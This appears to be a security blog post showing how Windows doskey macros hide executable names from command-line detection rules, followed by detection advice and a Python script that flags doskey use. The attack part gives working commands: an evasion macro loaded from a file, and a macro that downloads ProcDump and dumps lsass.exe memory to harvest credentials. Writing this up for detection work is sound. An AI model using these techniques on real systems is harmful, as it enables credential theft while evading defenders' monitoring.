Evading command-line detection with doskey

doskey

The doskey command can be used to evade some command-line detection rules by hiding the executable name behind an alias.

You can define and use a macro like this:

C:\Users\Target> doskey test1="%SystemRoot%\System32\WindowsPowerShell\v1.0\powershell.exe" $*
C:\Users\Target> test1 gci c:\


    Directory: C:\


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----        01/10/2022     14:37                Intel
d-----        07/05/2022     07:24                PerfLogs
d-r---        09/10/2022     09:14                Program Files
d-r---        03/10/2022     09:33                Program Files (x86)
d-r---        01/10/2022     14:13                Users
d-----        13/10/2022     08:36                Windows

Clearly, any good detection rule will still catch “powershell.exe” during macro definition, but you can import macros from a file so that the executable name never appears on the command line.

Define and save the macros to a file:

C:\Users\Attacker> doskey test1="%SystemRoot%\System32\WindowsPowerShell\v1.0\powershell.exe" $*
C:\Users\Attacker> doskey /m > legit.txt

Transfer the file to the target and load it:

C:\Users\Target> doskey /macrofile=legit.txt
C:\Users\Target> test1 gci c:\


    Directory: C:\


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----        01/10/2022     14:37                Intel
d-----        07/05/2022     07:24                PerfLogs
d-r---        09/10/2022     09:14                Program Files
d-r---        03/10/2022     09:33                Program Files (x86)
d-r---        01/10/2022     14:13                Users
d-----        13/10/2022     08:36                Windows

Another example (needs admin rights):

C:\Users\Attacker> doskey test2=powershell (New-Object System.Net.Webclient).DownloadFile('https://download.sysinternals.com/files/Procdump.zip', 'test.zip'); Expand-Archive test.zip -DestinationPath test -Force; test/procdump.exe -accepteula -ma lsass.exe lsass.dmp
C:\Users\Attacker> doskey /m > legit.txt

On target:

C:\Windows\System32> doskey /macrofile=legit.txt
C:\Windows\System32> test2

ProcDump v10.11 - Sysinternals process dump utility
Copyright (C) 2009-2021 Mark Russinovich and Andrew Richards
Sysinternals - www.sysinternals.com

[11:03:53] Dump 1 initiated: C:\Windows\System32\lsass.dmp
[11:03:54] Dump 1 writing: Estimated dump file size is 65 MB.
[11:03:54] Dump 1 complete: 65 MB written in 1.0 seconds
[11:03:55] Dump count reached.

You can also chain commands in a macro definition with $t:

doskey tx=cd temp$tdir /w $*

And change the default executable (cmd.exe) used for resolving macros:

doskey /exename=ftp.exe go=open 172.27.1.100$tmget *.TXT c:\reports$tbye

Detection

This will not work against detection hooks that sit at a lower level than command-line history, though, and you will leave behind an artifact containing the alias definitions.

I do not know to what extent “doskey” is still used on Windows systems today. I would suggest checking the occurrences of execution of that binary in a SIEM, for example, and if it is not frequently used, creating a detection rule on its execution.
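As an added example (not part of the original post), here is a small Python detection pass over constructed process-creation events in the shape of Sysmon Event ID 1 / Security 4688 records: it flags doskey.exe execution as suggested above, ranks /macrofile loads higher, and shows that the spawned child still carries its real image name because the alias is expanded before cmd.exe creates the child process. The event fields and their values are constructed assumptions, not real captures.

```python
import ntpath

# Constructed sample events shaped like Sysmon Event ID 1 / Security 4688
# records (assumed field names; values are illustrative, not real captures).
EVENTS = [
    {"Image": r"C:\Windows\System32\doskey.exe",
     "CommandLine": "doskey /macrofile=legit.txt",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\doskey.exe",
     "CommandLine": "doskey /m",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    # The alias "test1" is expanded before cmd.exe creates the child, so the
    # child's Image is still powershell.exe; only the typed line hid the name.
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" gci c:\ ',
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe"},
]


def image_name(path):
    """Basename of an image path, lower-cased for case-insensitive matching."""
    return ntpath.basename(path).lower()


def evaluate(event):
    """Return a list of (rule_name, severity) hits for one event."""
    hits = []
    name = image_name(event["Image"])
    cmd = event.get("CommandLine", "").lower()
    if name == "doskey.exe":
        # Loading aliases from a file is the variant that keeps the real
        # executable off the typed command line, so rank it higher.
        if "/macrofile" in cmd:
            hits.append(("doskey_macrofile_load", "high"))
        else:
            # Baseline rule suggested above: doskey is rare on most hosts.
            hits.append(("doskey_execution", "medium"))
    if name == "powershell.exe" and image_name(event["ParentImage"]) == "cmd.exe":
        # Image-based matching is unaffected by the alias trick.
        hits.append(("powershell_from_cmd", "low"))
    return hits


def scan(events):
    """Map each event index to its rule hits, skipping events with none."""
    results = {}
    for i, event in enumerate(events):
        hits = evaluate(event)
        if hits:
            results[i] = hits
    return results
```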